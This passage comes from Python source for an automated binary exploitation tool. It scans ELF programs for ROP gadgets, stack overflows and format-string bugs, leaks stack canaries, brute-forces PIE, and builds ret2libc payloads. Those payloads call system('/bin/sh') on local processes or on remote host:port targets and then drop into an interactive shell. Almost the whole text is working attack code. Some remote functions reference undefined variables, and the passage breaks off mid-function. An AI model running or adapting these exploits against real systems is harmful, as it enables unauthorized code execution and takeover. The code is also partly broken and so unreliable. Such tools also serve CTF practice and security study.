for line in lines:\n if '[INFO]' in line:\n continue\n \n if \"pop rdi;\" in line and \"pop rdi; pop\" in line:\n gadgets['pop_rdi'] = line.split(\":\")[0].strip()\n gadgets['other_rdi_registers'] = 1\n print_table_row([\"pop rdi (multi)\", gadgets['pop_rdi'], \"pop rdi; pop ...; ret\"], [Colors.END, Colors.YELLOW, Colors.END])\n \n elif \"pop rdi; ret;\" in line:\n gadgets['pop_rdi'] = line.split(\":\")[0].strip()\n gadgets['other_rdi_registers'] = 0\n print_table_row([\"pop rdi\", gadgets['pop_rdi'], \"pop rdi; ret\"], [Colors.END, Colors.YELLOW, Colors.END])\n \n elif \"pop rsi;\" in line and \"pop rsi; pop\" in line:\n gadgets['pop_rsi'] = line.split(\":\")[0].strip()\n gadgets['other_rsi_registers'] = 1\n print_table_row([\"pop rsi (multi)\", gadgets['pop_rsi'], \"pop rsi; pop ...; ret\"], [Colors.END, Colors.YELLOW, Colors.END])\n \n elif \"pop rsi; ret;\" in line:\n gadgets['pop_rsi'] = line.split(\":\")[0].strip()\n gadgets['other_rsi_registers'] = 0\n print_table_row([\"pop rsi\", gadgets['pop_rsi'], \"pop rsi; ret\"], [Colors.END, Colors.YELLOW, Colors.END])\n \n elif \"ret\" in line and \"ret \" not in line:\n gadgets['ret'] = line.split(\":\")[0].strip()\n print_table_row([\"ret\", gadgets['ret'], \"ret\"], [Colors.END, Colors.YELLOW, Colors.END])\n \n print_info(\"\")\n return gadgets['pop_rdi'], gadgets['pop_rsi'], gadgets['ret'], gadgets['other_rdi_registers'], gadgets['other_rsi_registers']\n \n except Exception as e:\n print_error(f\"failed to find ROP gadgets: {e}\")\n return None, None, None, None, None\n\ndef find_rop_gadgets_x32(program):\n \"\"\"Find ROP gadgets for x32 architecture\"\"\"\n print_info(\"searching for ROP gadgets (x32)\")\n \n gadgets = {\n 'pop_eax': None, 'pop_ebx': None, 'pop_ecx': None, 'pop_edx': None,\n 'pop_ecx_ebx': None, 'ret': None, 'int_0x80': None\n }\n \n registers_found = {'eax': 0, 'ebx': 0, 'ecx': 0, 'edx': 0}\n \n try:\n print_section_header(\"ROP GADGETS (x32)\")\n headers = [\"Gadget Type\", \"Address\", \"Status\"]\n print_table_header(headers)\n \n # Search for each register gadget\n register_searches = ['eax', 'ebx', 'ecx', 'edx']\n \n for reg in register_searches:\n os.system(f\"ropper --file {program} --search 'pop {reg};' > ropper.txt --nocolor 2>&1\")\n \n with open(\"ropper.txt\", \"r\") as file:\n lines = file.readlines()\n \n for line in lines:\n if '[INFO]' in line:\n continue\n \n if f\"pop {reg}; ret;\" in line:\n address = line.split(\":\")[0].strip()\n gadgets[f'pop_{reg}'] = address\n registers_found[reg] = 1\n print_table_row([f\"pop {reg}\", address, \"FOUND\"], [Colors.END, Colors.YELLOW, Colors.SUCCESS])\n break\n elif f\"pop {reg}\" in line and 'pop ebx' in line and reg == 'ecx':\n address = line.split(\":\")[0].strip()\n gadgets['pop_ecx_ebx'] = address\n registers_found[reg] = 1\n print_table_row([\"pop ecx; pop ebx\", address, \"FOUND\"], [Colors.END, Colors.YELLOW, Colors.SUCCESS])\n break\n \n if registers_found[reg] == 0:\n print_table_row([f\"pop {reg}\", \"N/A\", \"NOT FOUND\"], [Colors.END, Colors.END, Colors.ERROR])\n \n # Search for ret and int 0x80\n os.system(f\"ropper --file {program} --search 'ret;' > ropper.txt --nocolor 2>&1\")\n with open(\"ropper.txt\", \"r\") as file:\n for line in file.readlines():\n if '[INFO]' in line:\n continue\n if \"ret\" in line and \"ret \" not in line:\n gadgets['ret'] = line.split(\":\")[0].strip()\n print_table_row([\"ret\", gadgets['ret'], \"FOUND\"], [Colors.END, Colors.YELLOW, Colors.SUCCESS])\n break\n \n os.system(f\"ropper --file {program} --search 'int 0x80;' > ropper.txt --nocolor 2>&1\")\n with open(\"ropper.txt\", \"r\") as file:\n for line in file.readlines():\n if '[INFO]' in line:\n continue\n if \"int 0x80\" in line:\n gadgets['int_0x80'] = line.split(\":\")[0].strip()\n print_table_row([\"int 0x80\", gadgets['int_0x80'], \"FOUND\"], [Colors.END, Colors.YELLOW, Colors.SUCCESS])\n break\n \n print_info(\"\")\n return (gadgets['pop_eax'], gadgets['pop_ebx'], gadgets['pop_ecx'], gadgets['pop_edx'],\n gadgets['pop_ecx_ebx'], gadgets['ret'], gadgets['int_0x80'],\n registers_found['eax'], registers_found['ebx'], registers_found['ecx'], registers_found['edx'])\n \n except Exception as e:\n print_error(f\"failed to find ROP gadgets: {e}\")\n return None, None, None, None, None, None, None, 0, 0, 0, 0\n\ndef test_stack_overflow(program, bit):\n \"\"\"Test for stack overflow vulnerability with progress indication\"\"\"\n print_info(\"testing for stack overflow vulnerability\")\n \n char = 'A'\n padding = 0\n max_test = 10000\n \n print_section_header(\"STACK OVERFLOW DETECTION\")\n \n while padding < max_test:\n # Update progress every 100 iterations\n if padding % 100 == 0:\n print_progress(padding, max_test, \"Testing overflow\")\n \n input_data = char * (padding + 1)\n \n try:\n process = subprocess.Popen([program], stdin=subprocess.PIPE, \n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = process.communicate(input=input_data.encode(), timeout=1)\n \n if process.returncode == -11: # SIGSEGV\n alignment = 8 if bit == 64 else 4\n final_padding = padding + alignment\n print_progress(max_test, max_test, \"Testing overflow\")\n print_success(f\"stack overflow detected! Padding: {Colors.YELLOW}{final_padding}{Colors.END} bytes\")\n return final_padding\n \n except subprocess.TimeoutExpired:\n process.kill()\n except Exception:\n pass\n \n padding += 1\n \n print_progress(max_test, max_test, \"Testing overflow\")\n print_warning(\"no stack overflow vulnerability detected\")\n return 0\n\ndef analyze_vulnerable_functions(program, bit):\n \"\"\"Analyze assembly code to find vulnerable functions\"\"\"\n print_info(\"analyzing vulnerable functions\")\n \n try:\n with open(\"Objdump_Scan.txt\", 'r') as f:\n content = f.read()\n \n func_pattern = r'^[0-9a-f]+ <(\\w+)>:(.*?)(?=^\\d+ <\\w+>:|\\Z)'\n functions = re.finditer(func_pattern, content, re.MULTILINE | re.DOTALL)\n \n vulnerable_functions = []\n \n for func in functions:\n func_name = func.group(1)\n func_body = func.group(2)\n \n # Check for dangerous function calls with lea instruction\n dangerous_calls = ['read', 'gets', 'fgets', 'scanf']\n has_lea = 'lea' in func_body\n has_dangerous_call = any(call in func_body for call in dangerous_calls)\n \n if has_lea and has_dangerous_call:\n lea_match = re.search(r'lea\\s+(-?0x[0-9a-f]+)\\(%[er]bp\\)', func_body)\n if lea_match:\n offset_hex = lea_match.group(1)\n offset_dec = abs(int(offset_hex, 16))\n alignment = 8 if bit == 64 else 4\n padding = offset_dec + alignment\n \n vulnerable_functions.append({\n 'name': func_name,\n 'stack_size': offset_dec,\n 'padding': padding\n })\n \n if vulnerable_functions:\n print_section_header(\"VULNERABLE FUNCTIONS\")\n headers = [\"Function\", \"Stack Size\", \"Padding\"]\n print_table_header(headers)\n \n for func in vulnerable_functions:\n colors = [Colors.YELLOW, Colors.END, Colors.SUCCESS]\n print_table_row([func['name'], f\"{func['stack_size']} bytes\", f\"{func['padding']} bytes\"], colors)\n \n print_info(\"\")\n return vulnerable_functions[0]['padding'] # Return first found\n \n return None\n \n except Exception as e:\n print_error(f\"failed to analyze vulnerable functions: {e}\")\n return None\n\ndef vuln_func_name():\n \"\"\"Find vulnerable function names from objdump scan\"\"\"\n try:\n with open(\"Objdump_Scan.txt\", 'r') as f:\n content = f.read()\n\n functions = re.split(r'\\n\\n', content.strip())\n\n results = []\n for func in functions:\n func_name_match = re.search(r'<([^>]+)>', func)\n if not func_name_match:\n continue\n func_name = func_name_match.group(1)\n\n has_lea = bool(re.search(r'\\s+lea\\s', func))\n has_call_read = bool(re.search(r'call.*read@plt', func))\n has_call_read += bool(re.search(r'call.*gets@plt', func))\n has_call_read += bool(re.search(r'call.*fgets@plt', func))\n has_call_read += bool(re.search(r'call.*scanf@plt', func))\n \n if has_lea and has_call_read:\n lea_match = re.search(r'lea\\s+-\\s*(0x[0-9a-f]+)', func)\n if lea_match:\n results.append(func_name)\n\n return results\n except Exception as e:\n print_error(f\"failed to find vulnerable function names: {e}\")\n return []\n\ndef asm_stack_overflow(program, bit):\n \"\"\"Assembly-based stack overflow analysis with padding adjustment\"\"\"\n print_info(\"performing assembly-based overflow analysis\")\n \n try:\n with open(\"Objdump_Scan.txt\", 'r') as f:\n content = f.read()\n \n func_pattern = r'^[0-9a-f]+ <(\\w+)>:(.*?)(?=^\\d+ <\\w+>:|\\Z)'\n functions = re.finditer(func_pattern, content, re.MULTILINE | re.DOTALL)\n \n for func in functions:\n func_body = func.group(2)\n \n # Check for vulnerable patterns\n dangerous_calls = ['read', 'gets', 'fgets', 'scanf']\n has_lea = 'lea' in func_body\n has_call = 'call' in func_body\n has_dangerous_call = any(call in func_body for call in dangerous_calls)\n \n if has_lea and has_call and has_dangerous_call:\n lea_match = re.search(r'lea\\s+(-?0x[0-9a-f]+)\\(%[er]bp\\)', func_body)\n if lea_match:\n offset_hex = lea_match.group(1)\n offset_dec = abs(int(offset_hex, 16))\n \n if bit == 64:\n padding = offset_dec + 8\n else:\n padding = offset_dec + 4\n \n print_success(f\"stack size: {Colors.YELLOW}{offset_dec}{Colors.END} bytes\")\n print_success(f\"overflow padding adjustment: {Colors.YELLOW}{padding}{Colors.END} bytes\")\n \n return padding\n \n return None\n \n except Exception as e:\n print_error(f\"failed to perform assembly analysis: {e}\")\n return None\n\ndef check_binsh_string(program):\n \"\"\"Check for /bin/sh string in binary\"\"\"\n print_info(\"checking for /bin/sh string\")\n \n try:\n os.system(f'strings {program} | grep \"/bin/sh\" > check_binsh.txt')\n \n with open('check_binsh.txt', 'r') as file:\n content = file.read()\n \n if '/bin/sh' in content:\n print_success(\"/bin/sh string found in binary\")\n return True\n else:\n print_warning(\"/bin/sh string not found in binary\")\n return False\n \n except Exception as e:\n print_error(f\"failed to check for /bin/sh string: {e}\")\n return False\n\ndef check_binsh(program):\n \"\"\"Check for /bin/sh string in binary (pwnpasi_base.py compatible)\"\"\"\n os.system('strings ' + program +' | grep \"/bin/sh\" > check_binsh.txt')\n with open('check_binsh.txt', 'r') as file:\n content = file.read()\n \n return '/bin/sh' in content\n\ndef detect_format_string_vulnerability(program):\n \"\"\"Detect format string vulnerabilities\"\"\"\n print_info(\"testing for format string vulnerabilities\")\n \n test_cases = [\n b\"%x\" * 20,\n b\"%p\" * 20, \n b\"%s\" * 20,\n b\"%n\" * 5,\n b\"AAAA%x%x%x%x\",\n b\"%99999999s\",\n ]\n \n memory_pattern = re.compile(r'(0x[0-9a-fA-F]+)')\n vulnerable = False\n \n print_section_header(\"FORMAT STRING VULNERABILITY TEST\")\n headers = [\"Test Case\", \"Result\", \"Status\"]\n print_table_header(headers)\n \n for i, case in enumerate(test_cases):\n try:\n proc = subprocess.Popen(\n [program],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE,\n )\n stdout, stderr = proc.communicate(input=case, timeout=2)\n \n result = \"SAFE\"\n color = Colors.SUCCESS\n \n if memory_pattern.search(stdout.decode()):\n result = \"VULNERABLE\"\n color = Colors.ERROR\n vulnerable = True\n \n if proc.returncode != 0:\n result = \"CRASH\"\n color = Colors.CRITICAL\n vulnerable = True\n \n case_str = case.decode()[:20] + \"...\" if len(case) > 20 else case.decode()\n colors = [Colors.END, Colors.END, color]\n print_table_row([case_str, result, \"DETECTED\" if result != \"SAFE\" else \"NONE\"], colors)\n \n except subprocess.TimeoutExpired:\n colors = [Colors.END, Colors.END, Colors.WARNING]\n print_table_row([case.decode()[:20], \"TIMEOUT\", \"POSSIBLE\"], colors)\n vulnerable = True\n except Exception as e:\n colors = [Colors.END, Colors.END, Colors.ERROR]\n print_table_row([case.decode()[:20], \"ERROR\", \"UNKNOWN\"], colors)\n \n print()\n \n if vulnerable:\n print_success(\"format string vulnerability detected!\")\n return True\n else:\n print_warning(\"no format string vulnerability detected\")\n return False\n\ndef find_ftmstr_bss_symbols(program):\n \"\"\"Find format string BSS symbols\"\"\"\n function = 0\n with open(program, 'rb') as f:\n elf = ELFFile(f)\n symtab = elf.get_section_by_name('.symtab')\n if not symtab:\n print_warning(\"Did not find the variable used in the if-condition\")\n return function\n for symbol in symtab.iter_symbols():\n if (symbol['st_info'].type == 'STT_OBJECT' and\n symbol['st_size'] > 2 and\n '_' not in symbol.name):\n print_success(f\"Found the variable used in the if-condition: {symbol.name}, address: {hex(symbol['st_value'])}\")\n function = 1\n buf_addr = hex(symbol['st_value'])\n function_name = symbol.name\n\n return function, buf_addr, function_name\n\ndef find_offset(program):\n \"\"\"Find format string offset\"\"\"\n print_info(\"searching for format string offset\")\n \n p = process(program)\n payload = b'AAAA' + b'.%x' * 40 # Payload to leak stack values\n print_payload(f\"testing payload: {payload[:20]}...\")\n \n p.sendline(payload)\n try:\n output = p.recv(timeout=2) # Receive output from the program\n except:\n output = p.clean() # If timeout, clean buffer\n \n parts = output.split(b'.') # Split output by '.'\n for i in range(1, len(parts)):\n # Extract first word before space or newline after each '.'\n part = parts[i].split(b'\\n')[0].split()[0] if b' ' in parts[i] else parts[i]\n try:\n val = int(part, 16) # Convert hex string to int\n if val == 0x41414141: # Check for 'AAAA' in hex\n p.close()\n print_success(f\"format string offset found: {i}\")\n return i # Return the offset where 'AAAA' appears\n except:\n continue\n p.close()\n print_error(\"offset not found\")\n raise ValueError('[-]Offset not found') # Raise if not found\n\ndef system_fmtstr(program, offset, buf_addr):\n \"\"\"Format string exploitation (local)\"\"\"\n print_section_header(\"EXPLOITATION: Format String - Local\")\n print_payload(\"preparing format string exploit\")\n \n io = process(program)\n elf = ELF(program)\n buf_addr = int(buf_addr, 16)\n buf_addr = p32(buf_addr)\n system_addr = buf_addr\n offset_bytes = str(offset).encode()\n \n payload = system_addr + b'%' + offset_bytes + b'$n'\n print_payload(f\"payload: {payload}\")\n \n io.sendline(payload)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'Format String - Local',\n payload,\n 0, # No padding for format string\n {\n 'buf_addr': hex(int(buf_addr.hex(), 16)),\n 'system_addr': hex(int(system_addr.hex(), 16)),\n 'offset': str(offset)\n },\n 'Format String Vulnerability',\n 'x32'\n )\n \n io.interactive()\n\ndef ret2libc_write_x64(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, libc_path):\n \"\"\"ret2libc exploitation using write function (x64)\"\"\"\n print_section_header(\"EXPLOITATION: ret2libc (write) - x64\")\n print_payload(\"preparing ret2libc exploit using write function\")\n \n io = process(program)\n \n if libc == 1:\n if libc_path is None:\n print_info(\"using LibcSearcher for libc resolution\")\n else:\n print_info(f\"using detected libc: {libc_path}\")\n libc = ELF(libc_path)\n else:\n libc = ELF(libc)\n \n e = ELF(program)\n main_addr = e.symbols['main']\n write_plt = e.symbols['write']\n write_got = e.got['write']\n \n print_info(f\"main address: {Colors.YELLOW}{hex(main_addr)}{Colors.END}\")\n print_info(f\"write@plt: {Colors.YELLOW}{hex(write_plt)}{Colors.END}\")\n print_info(f\"write@got: {Colors.YELLOW}{hex(write_got)}{Colors.END}\")\n \n pop_rdi_addr = int(pop_rdi_addr, 16)\n pop_rsi_addr = int(pop_rsi_addr, 16)\n ret_addr = int(ret_addr, 16)\n \n # Stage 1: Leak write address\n print_payload(\"stage 1: leaking write address from GOT\")\n if other_rsi_registers == 1:\n payload1 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(1),\n p64(pop_rsi_addr),\n p64(write_got),\n p64(0),\n p64(write_plt),\n p64(main_addr)\n ])\n elif other_rdi_registers == 1:\n payload1 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(1),\n p64(0),\n p64(pop_rsi_addr),\n p64(write_got),\n p64(write_plt),\n p64(main_addr)\n ])\n elif other_rdi_registers == 0 and other_rsi_registers == 0:\n payload1 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(1),\n p64(pop_rsi_addr),\n p64(write_got),\n p64(write_plt),\n p64(main_addr)\n ])\n \n io.recv()\n io.sendline(payload1)\n \n write_addr = u64(io.recv(8))\n print_success(f\"write address leaked: {Colors.YELLOW}{hex(write_addr)}{Colors.END}\")\n \n # Calculate system and /bin/sh addresses\n if libc == 1:\n libc = LibcSearcher(\"write\", write_addr)\n libcbase = write_addr - libc.dump('write')\n system_addr = libcbase + libc.dump('system')\n sh_addr = libcbase + libc.dump('str_bin_sh')\n else:\n libc_write = libc.symbols['write']\n system_addr = write_addr - libc_write + libc.symbols['system']\n sh_addr = write_addr - libc_write + next(libc.search(b'/bin/sh'))\n \n print_success(f\"system address calculated: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_success(f\"/bin/sh address calculated: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n \n # Stage 2: Execute system(\"/bin/sh\")\n print_payload(\"stage 2: executing system('/bin/sh')\")\n \n if other_rdi_registers == 1:\n payload2 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(sh_addr),\n p64(0),\n p64(system_addr),\n p64(0)\n ])\n else:\n payload2 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(sh_addr),\n p64(system_addr),\n p64(0)\n ])\n \n io.recv()\n \n io.sendline(payload2)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'ret2libc (write) - x64',\n payload2,\n padding,\n {\n 'pop_rdi': hex(pop_rdi_addr),\n 'pop_rsi': hex(pop_rsi_addr),\n 'ret': hex(ret_addr),\n 'write_plt': hex(write_plt),\n 'write_got': hex(write_got),\n 'main': hex(main_addr),\n 'system': hex(system_addr),\n 'sh': hex(sh_addr)\n },\n 'Stack Buffer Overflow',\n 'x64'\n )\n \n io.interactive()\n\ndef ret2libc_write_x32_remote(program, libc, padding, url, port):\n \"\"\"ret2libc exploitation using write function (x32 remote)\"\"\"\n print_section_header(\"EXPLOITATION: ret2libc (write) - x32 Remote\")\n print_payload(\"preparing ret2libc exploit using write function\")\n \n io = remote(url, port)\n \n if libc == 1:\n print_info(\"using LibcSearcher for libc resolution\")\n else:\n libc = ELF(libc)\n \n e = ELF(program)\n main_addr = e.symbols['main']\n write_plt = e.symbols['write']\n write_got = e.got['write']\n \n print_info(f\"main address: {Colors.YELLOW}{hex(main_addr)}{Colors.END}\")\n print_info(f\"write@plt: {Colors.YELLOW}{hex(write_plt)}{Colors.END}\")\n print_info(f\"write@got: {Colors.YELLOW}{hex(write_got)}{Colors.END}\")\n \n # Stage 1: Leak write address\n print_payload(\"stage 1: leaking write address from GOT\")\n payload1 = asm('nop') * padding + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)\n \n io.recv()\n io.sendline(payload1)\n \n write_addr = u32(io.recv(4))\n print_success(f\"write address leaked: {Colors.YELLOW}{hex(write_addr)}{Colors.END}\")\n \n # Calculate system and /bin/sh addresses\n if libc == 1:\n libc = LibcSearcher(\"write\", write_addr)\n libcbase = write_addr - libc.dump('write')\n system_addr = libcbase + libc.dump('system')\n sh_addr = libcbase + libc.dump('str_bin_sh')\n else:\n libc_write = libc.symbols['write']\n system_addr = write_addr - libc_write + libc.symbols['system']\n sh_addr = write_addr - libc_write + next(libc.search(b'/bin/sh'))\n \n print_success(f\"system address calculated: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_success(f\"/bin/sh address calculated: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n \n # Stage 2: Execute system(\"/bin/sh\")\n print_payload(\"stage 2: executing system('/bin/sh')\")\n payload2 = asm('nop') * padding + p32(system_addr) + p32(0) + p32(sh_addr)\n \n io.recv()\n io.sendline(payload2)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'ret2libc (puts) - x64',\n payload2,\n padding,\n {\n 'pop_rdi': hex(int(pop_rdi_addr.hex(), 16)),\n 'ret': hex(int(ret_addr.hex(), 16)),\n 'puts_plt': hex(puts_plt),\n 'puts_got': hex(puts_got),\n 'main': hex(main_addr),\n 'puts_addr': hex(puts_addr),\n 'system': hex(system_addr),\n 'sh': hex(sh_addr)\n },\n 'Stack Buffer Overflow',\n 'x64'\n )\n \n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef ret2libc_write_x64_remote(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, url, port):\n \"\"\"ret2libc exploitation using write function (x64 remote)\"\"\"\n print_section_header(\"EXPLOITATION: ret2libc (write) - x64 Remote\")\n print_payload(\"preparing ret2libc exploit using write function\")\n \n io = remote(url, port)\n \n if libc == 1:\n print_info(\"using LibcSearcher for libc resolution\")\n else:\n libc = ELF(libc)\n \n e = ELF(program)\n main_addr = e.symbols['main']\n write_plt = e.symbols['write']\n write_got = e.got['write']\n \n print_info(f\"main address: {Colors.YELLOW}{hex(main_addr)}{Colors.END}\")\n print_info(f\"write@plt: {Colors.YELLOW}{hex(write_plt)}{Colors.END}\")\n print_info(f\"write@got: {Colors.YELLOW}{hex(write_got)}{Colors.END}\")\n \n pop_rdi_addr = int(pop_rdi_addr, 16)\n pop_rsi_addr = int(pop_rsi_addr, 16)\n ret_addr = int(ret_addr, 16)\n \n # Stage 1: Leak write address\n print_payload(\"stage 1: leaking write address from GOT\")\n if other_rsi_registers == 1:\n payload1 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(1),\n p64(pop_rsi_addr),\n p64(write_got),\n p64(0),\n p64(write_plt),\n p64(main_addr)\n ])\n elif other_rdi_registers == 1:\n payload1 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(1),\n p64(0),\n p64(pop_rsi_addr),\n p64(write_got),\n p64(write_plt),\n p64(main_addr)\n ])\n elif other_rdi_registers == 0 and other_rsi_registers == 0:\n payload1 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(1),\n p64(pop_rsi_addr),\n p64(write_got),\n p64(write_plt),\n p64(main_addr)\n ])\n \n io.recv()\n io.sendline(payload1)\n \n write_addr = u64(io.recv(8))\n print_success(f\"write address leaked: {Colors.YELLOW}{hex(write_addr)}{Colors.END}\")\n \n # Calculate system and /bin/sh addresses\n if libc == 1:\n libc = LibcSearcher(\"write\", write_addr)\n libcbase = write_addr - libc.dump('write')\n system_addr = libcbase + libc.dump('system')\n sh_addr = libcbase + libc.dump('str_bin_sh')\n else:\n libc_write = libc.symbols['write']\n system_addr = write_addr - libc_write + libc.symbols['system']\n sh_addr = write_addr - libc_write + next(libc.search(b'/bin/sh'))\n \n print_success(f\"system address calculated: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n print_success(f\"/bin/sh address calculated: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n \n # Stage 2: Execute system(\"/bin/sh\")\n print_payload(\"stage 2: executing system('/bin/sh')\")\n io.recv()\n \n if other_rdi_registers == 1:\n payload2 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(sh_addr),\n p64(0),\n p64(ret_addr),\n p64(system_addr)\n ])\n else:\n payload2 = flat([\n asm('nop') * padding,\n p64(pop_rdi_addr),\n p64(sh_addr),\n p64(ret_addr),\n p64(system_addr)\n ])\n \n io.sendline(payload2)\n \n # Handle successful exploitation\n handle_exploitation_success(\n 'ret2libc (puts) - x64',\n payload2,\n padding,\n {\n 'puts_plt': hex(puts_plt),\n 'puts_got': hex(puts_got),\n 'main': hex(main_addr),\n 'puts_addr': hex(puts_addr),\n 'system': hex(system_addr),\n 'sh': hex(sh_addr)\n },\n 'Stack Buffer Overflow',\n 'x64'\n )\n \n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef system_fmtstr_remote(program, offset, buf_addr, url, port):\n \"\"\"Format string exploitation (remote)\"\"\"\n print_section_header(\"EXPLOITATION: Format String - Remote\")\n print_payload(\"preparing format string exploit\")\n \n io = remote(url, port)\n elf = ELF(program)\n buf_addr = int(buf_addr, 16)\n buf_addr = p64(buf_addr)\n system_addr = buf_addr\n offset_bytes = str(offset).encode()\n \n payload = system_addr + b'%' + offset_bytes + b'$n'\n print_payload(f\"payload: {payload}\")\n \n io.sendline(payload)\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n\ndef fmtstr_print_strings(program):\n \"\"\"Print strings using format string (local)\"\"\"\n print_section_header(\"FORMAT STRING LEAK - Local\")\n print_info(\"leaking program strings using format string\")\n elf = context.binary = ELF(program, checksec=False)\n \n for i in range(100):\n try:\n io = process(program, level='error')\n io.sendline('%{}$s'.format(i).encode())\n result = io.recv()\n if result and len(result.strip()) > 0:\n print_info(f\"offset {i}: {Colors.YELLOW}{result}{Colors.END}\")\n io.close()\n except EOFError:\n pass\n\ndef fmtstr_print_strings_remote(program, url, port):\n \"\"\"Print strings using format string (remote)\"\"\"\n print_section_header(\"FORMAT STRING LEAK - Remote\")\n print_info(f\"leaking program strings from {url}:{port}\")\n elf = context.binary = ELF(program, checksec=False)\n \n for i in range(100):\n try:\n io = remote(url, port)\n io.sendline('%{}$s'.format(i).encode())\n result = io.recv()\n if result and len(result.strip()) > 0:\n print_info(f\"offset {i}: {Colors.YELLOW}{result}{Colors.END}\")\n io.close()\n except EOFError:\n pass\n\ndef leakage_canary_value(program):\n \"\"\"Leak canary values using format string\"\"\"\n print_info(\"leaking canary values\")\n elf = context.binary = ELF(program, checksec=False)\n with open('canary.txt', 'w') as f:\n for i in range(100):\n try:\n with process(program) as p:\n p.sendline(f'%{i}$p'.encode())\n p.recvline()\n result = p.recvline().decode().strip()\n if result:\n line = f\"{result}\\n\"\n f.write(line)\n except EOFError:\n pass\n\ndef canary_fuzz(program, bit):\n \"\"\"Fuzz for canary bypass\"\"\"\n print_section_header(\"CANARY BYPASS FUZZING\")\n print_info(\"fuzzing for canary bypass\")\n \n if bit == 64:\n char = 'A'\n test = 'AAAAAAAA'\n with open('canary.txt', 'r') as f:\n lines = [line.strip() for line in f.readlines()[1:]]\n \n c = 1\n i = 1\n max_c = 300\n max_i = len(lines)\n \n print_info(f\"testing {max_i} canary values with {max_c} parameters\")\n \n while c < max_c and i < max_i:\n current_line = lines[i]\n found_j = False\n exit_current = False\n for j in range(i + 1, max_i):\n if lines[j].startswith('0x8'):\n diff = j - i\n padding = 0\n found_j = True\n \n print_info(f\"testing parameter c={c}, diff={diff}\")\n \n while padding <= 300:\n io = process(program)\n io.recv()\n io.sendline(f'%{c}$p'.encode())\n result = io.recvline().decode().strip()\n \n if result.startswith('0x'):\n result = int(result, 16)\n result = p64(result)\n \n input_data = flat([char * (padding + 1), result, test * diff])\n io.recv()\n io.sendline(input_data)\n io.wait()\n \n if io.poll() == -11:\n padding = padding + 1\n print_success(f\"canary bypass found! c={c}, padding={padding}, diff={diff}\")\n return padding, c, diff\n \n io.close()\n padding += 1\n \n if padding > 300:\n print_warning(f\"parameter c={c} test failed, trying next parameter\")\n c += 1\n i += 1\n exit_current = True\n break\n break\n \n if exit_current:\n break\n \n if exit_current:\n continue\n \n if not found_j:\n i += 1\n if i >= max_i:\n c += 1\n i = 0\n \n print_critical(\"All parameters tested, no valid offset found\")\n padding = None\n return padding, None, None\n \n # Similar logic for 32-bit\n if bit == 32:\n char = 'A'\n test = 'AAAA'\n with open('canary.txt', 'r') as f:\n lines = [line.strip() for line in f.readlines()[1:]]\n \n c = 1\n i = 1\n max_c = 300\n max_i = len(lines)\n \n while c < max_c and i < max_i:\n current_line = lines[i]\n found_j = False\n exit_current = False\n for j in range(i + 1, max_i):\n if lines[j].startswith('0x8'):\n diff = j - i\n padding = 0\n found_j = True\n \n while padding <= 300:\n io = process(program)\n io.recv()\n io.sendline(f'%{c}$p'.encode())\n result = io.recvline().decode().strip()\n print_info(f\"Debug: c={c}, i={i}, padding={padding}, result={result}, diff={diff}\")\n \n if result.startswith('0x'):\n result = int(result, 16)\n result = p32(result)\n \n input_data = flat([char * (padding + 1), result, test * diff])\n io.recv()\n io.sendline(input_data)\n io.wait()\n \n if io.poll() == -11:\n padding = padding + 1\n print_success(f\"canary bypass found! c={c}, padding={padding}, diff={diff}\")\n return padding, c, diff\n \n io.close()\n padding += 1\n \n if padding > 300:\n print_warning(f\"c={c} test failed, trying next parameter\")\n c += 1\n i += 1\n exit_current = True\n break\n break\n \n if exit_current:\n break\n \n if exit_current:\n continue\n \n if not found_j:\n i += 1\n if i >= max_i:\n c += 1\n i = 0\n \n print_critical(\"All parameters tested, no valid offset found\")\n padding = None\n return padding, None, None\n\ndef pie_backdoor_exploit(program, padding, backdoor, libc_path, libc, callsystem):\n \"\"\"PIE backdoor exploitation (local)\"\"\"\n print_section_header(\"EXPLOITATION: PIE Backdoor - Local\")\n print_payload(\"preparing PIE backdoor brute force\")\n \n elf = ELF(program)\n if backdoor == 1:\n backdoor = elf.symbols[\"backdoor\"] + 0x04\n if callsystem == 1:\n backdoor = elf.symbols[\"callsystem\"] + 0x04\n backdoor_bytes = p64(backdoor)\n valid_bytes = backdoor_bytes.replace(b'\\x00', b'')\n valid_byte_length = len(valid_bytes)\n\n cleaned_bytes = backdoor_bytes[:valid_byte_length]\n payload = asm(\"nop\") * padding + cleaned_bytes\n\n count = 1\n print_info(\"starting PIE brute force attack\")\n while True:\n io = process(program)\n try:\n count += 1\n print_info(f\"attempt {Colors.YELLOW}{count}{Colors.END}\", prefix=\"[BRUTE]\")\n io.recv()\n io.send(payload)\n recv = io.recv(timeout=10)\n except:\n print_warning(f\"attempt {count} failed\", prefix=\"[BRUTE]\")\n else:\n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n io.interactive()\n break\n\ndef pie_backdoor_exploit_remote(program, 